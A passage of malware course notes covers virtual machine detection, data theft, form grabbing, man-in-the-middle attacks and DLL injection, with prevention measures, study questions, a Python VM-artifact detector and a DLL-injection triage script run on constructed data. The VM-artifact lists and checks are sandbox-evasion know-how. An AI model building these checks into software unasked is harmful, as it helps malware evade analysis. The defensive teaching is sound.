researchers from analyzing malicious code.
✔ Target Real Systems – Some malware executes only on physical machines to
avoid automated analysis.

B. Security & Software Perspective

✔ Anti-Cheat & Digital Rights Management (DRM) – Prevents virtualized
environments from being exploited to bypass software restrictions.
✔ Software Licensing Protection – Ensures software is not being run on multiple
cloned virtual machines.
✔ Forensic Analysis & Penetration Testing – Determines if a system is running
in a VM to adjust attack strategies.

2. Methods of Virtual Machine Detection

A. Hardware & Processor Checks

• CPUID Instruction – Leaf 1 sets the "hypervisor present" bit (ECX bit 31)
when a hypervisor is running, and leaf 0x40000000 returns a vendor string
such as "VMwareVMware", "VBoxVBoxVBox", "Microsoft Hv" or "KVMKVMKVM".
Checking for Intel VT-x or AMD-V support is not a VM test; those flags
describe the CPU, not whether the code is running as a guest.
• BIOS/UEFI Vendor Checks – Virtual machines often report firmware or system
manufacturer strings like "VMware, Inc." or "innotek GmbH" (VirtualBox).
• MAC Address Detection – Virtual NICs have vendor-specific MAC address
prefixes (e.g., VMware uses 00:05:69, 00:0C:29 and 00:50:56; VirtualBox
uses 08:00:27).

B. Software & System Artifacts

• Registry Keys & Files – Virtual machines store identifiable files and
registry entries (e.g., HKLM\SOFTWARE\VMware, Inc.).
• Running Processes & Services – VM-related processes like
VBoxService.exe or vmtoolsd.exe indicate virtualization.
• Filesystem & Drivers – Searching for drivers like vboxguest.sys or
vm3dmp.sys reveals VM presence.

C. Timing & Performance Analysis

• Execution Timing Differences – Instructions that trap to the hypervisor
(CPUID, and on many configurations RDTSC) take far longer than on bare
metal, so malware times a loop of them and compares against a threshold.
• Clock Drift Analysis – Comparing timestamps from different sources (the
CPU timestamp counter, the system clock, an external time server) can reveal
inconsistencies introduced by virtualization or by a sandbox that
fast-forwards the clock to defeat sleep-based evasion.

D. Interaction-Based Detection

• Mouse & Keyboard Behavior – Some malware detects scripted inputs
commonly used in VM-based analysis.
• Screen Resolution & Graphics Capabilities – VMs often use lower
resolutions and lack GPU acceleration.
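The artifact checks from section 2 applied to a constructed host snapshot; this is an added example, not code from the notes. A real implementation would fill the snapshot from OS APIs (WMI, the registry, the adapter list), and the CPUID and timing checks need native code and are not shown. The artifact tables are short illustrative lists, not a complete signature set.

```python
"""Artifact-based virtual machine detection over a constructed host snapshot.

Checks mirror the notes: MAC OUI, firmware vendor, guest-tool processes,
drivers and registry keys. The snapshot dictionaries are constructed; the
artifact tables are short illustrative lists.
"""

VM_MAC_OUIS = {"00:05:69": "VMware", "00:0c:29": "VMware", "00:1c:14": "VMware",
               "00:50:56": "VMware", "08:00:27": "VirtualBox", "00:15:5d": "Hyper-V"}
VM_BIOS_VENDORS = {"vmware": "VMware", "innotek": "VirtualBox", "xen": "Xen",
                   "seabios": "QEMU/KVM", "bochs": "QEMU/Bochs"}
VM_PROCESSES = {"vmtoolsd.exe": "VMware", "vboxservice.exe": "VirtualBox",
                "vboxtray.exe": "VirtualBox", "vmsrvc.exe": "Virtual PC"}
VM_DRIVERS = {"vm3dmp.sys": "VMware", "vmhgfs.sys": "VMware", "vmmouse.sys": "VMware",
              "vboxguest.sys": "VirtualBox", "vboxmouse.sys": "VirtualBox"}
VM_REGISTRY_KEYS = {r"hklm\software\vmware, inc.\vmware tools": "VMware",
                    r"hklm\software\oracle\virtualbox guest additions": "VirtualBox"}


def oui(mac: str) -> str:
    """Normalise 'AA-BB-CC-..' / 'aa:bb:cc:..' to the first three octets."""
    return mac.lower().replace("-", ":")[:8]


def detect_vm(snapshot: dict):
    """Return (verdict, evidence); evidence is a list of (check, vendor, value)."""
    evidence = []
    for mac in snapshot.get("macs", []):
        if oui(mac) in VM_MAC_OUIS:
            evidence.append(("mac_oui", VM_MAC_OUIS[oui(mac)], mac))
    bios = snapshot.get("bios_vendor", "").lower()
    for needle, vendor in VM_BIOS_VENDORS.items():
        if needle in bios:
            evidence.append(("bios_vendor", vendor, snapshot["bios_vendor"]))
    for proc in snapshot.get("processes", []):
        if proc.lower() in VM_PROCESSES:
            evidence.append(("process", VM_PROCESSES[proc.lower()], proc))
    for drv in snapshot.get("drivers", []):
        if drv.lower() in VM_DRIVERS:
            evidence.append(("driver", VM_DRIVERS[drv.lower()], drv))
    for key in snapshot.get("registry_keys", []):
        if key.lower() in VM_REGISTRY_KEYS:
            evidence.append(("registry", VM_REGISTRY_KEYS[key.lower()], key))
    if not evidence:
        return "physical (no artifacts found)", evidence
    vendors = sorted({vendor for _, vendor, _ in evidence})
    return "virtual: " + ", ".join(vendors), evidence


# Constructed snapshots: a VMware guest and a physical workstation.
VMWARE_GUEST = {
    "macs": ["00-0C-29-3A-5B-6C"],
    "bios_vendor": "VMware, Inc.",
    "processes": ["explorer.exe", "vmtoolsd.exe", "svchost.exe"],
    "drivers": ["ntfs.sys", "vm3dmp.sys"],
    "registry_keys": [r"HKLM\SOFTWARE\VMware, Inc.\VMware Tools"],
}
PHYSICAL_HOST = {
    "macs": ["3C-7C-3F-12-34-56"],
    "bios_vendor": "Dell Inc.",
    "processes": ["explorer.exe", "svchost.exe"],
    "drivers": ["ntfs.sys", "nvlddmkm.sys"],
    "registry_keys": [],
}

if __name__ == "__main__":
    for snap in (VMWARE_GUEST, PHYSICAL_HOST):
        verdict, ev = detect_vm(snap)
        print(verdict, [check for check, _, _ in ev])
```

A sandbox operator reads the same tables in reverse: every artifact a sample looks for is one the analysis VM should rename, randomise, or remove, and the lookups themselves (a registry query for "VMware Tools", a read of the NIC's MAC) are worth logging as evasion behaviour.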

Stealing Information and Exploitation

What is stealing information?

• Data theft is the act of stealing information stored on corporate databases,
devices, and servers.
• This form of corporate theft is a significant risk for businesses of all
sizes and can originate both inside and outside an organization.
• The term data theft can give the impression that this kind of breach is based
on malicious intent, but this is not always the case: data theft can also be an
unintentional act.
• An employee may, for example, take home information on an unsecured flash
drive or retain access to information after their contract has ended.
• The malicious theft of employee data often occurs without the victims ever
knowing about it, as a result of their accounts or personal devices being
compromised by hackers capitalizing on poor password management or
unsecured networks.
• Bad actors that gain access to companies’ systems can lurk inside networks,
pretending to be a legitimate user for days, weeks, or years.
• By remaining undetected, they can gain additional access rights to
increasingly sensitive corporate datasets and pose a growing threat to
unaware businesses.
Exploitation Techniques in Cybersecurity

Exploitation in cybersecurity refers to the use of various methods to take advantage
of system vulnerabilities, software flaws, or human weaknesses to gain
unauthorized access, steal data, or manipulate system behavior. Below are three
key exploitation techniques:

1. Form Grabbing

Definition:

Form grabbing is a technique used by cybercriminals to intercept data entered into
web forms before it is transmitted over the network. Unlike keyloggers that record
keystrokes, form grabbers capture the data at the application level.

How It Works:

• A malicious program, often a Trojan or browser add-on, hooks the browser's
own functions (for example the HTTP send routines of the browser or of
the WinINet library it uses).
• When a user enters credentials (e.g., usernames, passwords, credit card
details) into a web form, the malware captures the data at the moment the
browser submits it, before TLS encrypts it.
• The stolen data is sent to the attacker; HTTPS offers no protection because
the capture happens inside the browser, before the secure connection is used.

Examples:
• Zeus Trojan (targets banking credentials).
• SpyEye (steals login details and personal data).

Prevention Measures:
• Use antivirus and anti-malware software, and keep the browser free of
untrusted extensions.
• Enable multi-factor authentication (MFA), so that a captured password alone
is not enough to log in.
• Use password managers; they protect against look-alike phishing domains,
though not against a grabber already hooked into the browser.
• Monitor network traffic for suspicious activities, such as posts to unknown
hosts right after a login.
2. Man-in-the-Middle (MitM) Attacks

Definition:

A Man-in-the-Middle attack occurs when an attacker secretly intercepts and alters
communication between two parties.

How It Works:

• The attacker positions themselves between the victim and a legitimate server
or user.
• They can eavesdrop, modify, or steal sensitive data.
• Often used over insecure Wi-Fi networks or via compromised routers.

Types of MitM Attacks:


• Session Hijacking – Stealing session cookies to take over an active user
session.
• HTTPS Spoofing – Tricking users into believing they are on a secure site.
• Wi-Fi Eavesdropping – Setting up rogue Wi-Fi hotspots to capture traffic.
• DNS Spoofing – Redirecting users to fake websites by altering DNS
responses.
Prevention Measures:
• Use VPNs when on public Wi-Fi.
• Check for HTTPS and a valid certificate, and never click through certificate
warnings; site owners can enforce this with HSTS.
• Enable end-to-end encryption for messaging and communication.
• Use a resolver that supports DNS over HTTPS or DNS over TLS (for example
Cloudflare 1.1.1.1 or Google 8.8.8.8) so DNS answers cannot be altered on the
local network.

3. DLL Injection

Definition:

DLL (Dynamic Link Library) Injection is a technique where an attacker injects
malicious code into a legitimate process by loading a rogue DLL file.

How It Works:

• Attackers force a legitimate process (e.g., a browser or system service) to
load a malicious DLL.
• The rogue DLL executes commands with the same privileges as the
legitimate application.
• This allows attackers to manipulate system processes, bypass security
software, or steal data.

Common Uses:

• Privilege Escalation – Gaining higher-level system access.
• Keylogging – Capturing user input via injected DLLs.
• Backdoor Creation – Establishing persistent remote access.

Examples:

• TrickBot (a banking malware that uses DLL injection).
• Cobalt Strike (penetration testing tool, often abused by attackers).

Prevention Measures:
• Require signed DLLs where the platform supports it (Windows' binary
signature policy mitigation can restrict a process to Microsoft-signed
modules), so unauthorized DLLs are refused at load time.
• Monitor system processes for unusual behavior, in particular modules loaded
from user-writable directories.
• Use endpoint protection to detect DLL injection attempts.
• Implement application allow-listing so that only trusted DLLs can load.
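Detection of the kind the second and third measures describe, as an added example over constructed image-load events shaped like Sysmon Event ID 7 (image loaded) records; these are not real telemetry and not code from the notes. The name lists and rules are assumptions chosen to show the three cues a defender uses: an unsigned module, a module from a user-writable directory, and a well-known system DLL name loaded from outside the system directory (search-order hijacking).

```python
"""Triage of image-load telemetry for DLL injection and search-order hijacking.

Events are shaped like Sysmon Event ID 7 (Image, ImageLoaded, Signed) but are
constructed here. The directory and DLL name lists are short illustrations.
"""
import ntpath   # Windows path handling on any host

USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\", "\\downloads\\")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
HIGH_VALUE_PROCESSES = {"lsass.exe", "winlogon.exe", "services.exe",
                        "svchost.exe", "explorer.exe"}
# DLLs that applications routinely import and that sideloading attacks impersonate.
COMMON_SYSTEM_DLLS = {"version.dll", "dbghelp.dll", "cryptbase.dll",
                      "userenv.dll", "wlbsctrl.dll"}


def classify(event: dict) -> list:
    """Return the reasons an image-load event deserves a look (empty = benign)."""
    image = ntpath.basename(event["Image"]).lower()
    loaded = event["ImageLoaded"].lower()
    dll = ntpath.basename(loaded)
    reasons = []
    if not event.get("Signed", False):
        reasons.append("unsigned module")
    if any(segment in loaded for segment in USER_WRITABLE):
        reasons.append("loaded from user-writable path")
    if dll in COMMON_SYSTEM_DLLS and not loaded.startswith(SYSTEM_DIRS):
        reasons.append("system DLL name outside system directory (search-order hijack)")
    if reasons and image in HIGH_VALUE_PROCESSES:
        reasons.append(f"target is high-value process {image}")
    return reasons


def triage(events):
    """(process, dll path, reasons) for every event that tripped a rule."""
    hits = []
    for event in events:
        reasons = classify(event)
        if reasons:
            hits.append((ntpath.basename(event["Image"]), event["ImageLoaded"], reasons))
    return hits


# Constructed events: one benign system load, an injected DLL from a temp
# directory, an unsigned DLL loaded into lsass, a sideloaded version.dll, and
# the genuine version.dll for comparison.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\crypt32.dll", "Signed": True},
    {"Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Users\bob\AppData\Local\Temp\upd.dll", "Signed": False},
    {"Image": r"C:\Windows\System32\lsass.exe",
     "ImageLoaded": r"C:\Windows\Temp\ss.dll", "Signed": False},
    {"Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\version.dll", "Signed": False},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": True},
]

if __name__ == "__main__":
    for process, dll, reasons in triage(SAMPLE_EVENTS):
        print(process, "<-", dll, reasons)
```

Injection through CreateRemoteThread/LoadLibrary produces exactly such a load event in the victim process, which is why image-load logging (or an EDR's equivalent) catches it even when the injector itself was never seen.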

Assignment Questions
1. Compare and contrast worms and viruses in terms of propagation, impact, and
real-world examples. How have these evolved over time?
2. What are rootkits, and how do they alter the system to hide their presence?

3. Describe the workings of a man-in-the-middle (MITM) attack. How can
attackers use this to intercept sensitive information?

4. Explain DLL Injection. What are its implications in process hijacking?

5. What is token kidnapping in Windows systems? How does it enable privilege
escalation?

Tutorial Questions

1. What is the primary difference between a worm and a virus?

2. Define obfuscation in the context of malware.

3. What is a rootkit, and why is it difficult to detect?

4. What does token kidnapping exploit in Windows?

5. How can DLL injection be detected by antivirus or endpoint protection
software?

6. True/False: BHOs are only used by legitimate software like toolbars and cannot
be malicious.

7. What is virtual machine detection, and why would malware avoid execution in
VMs?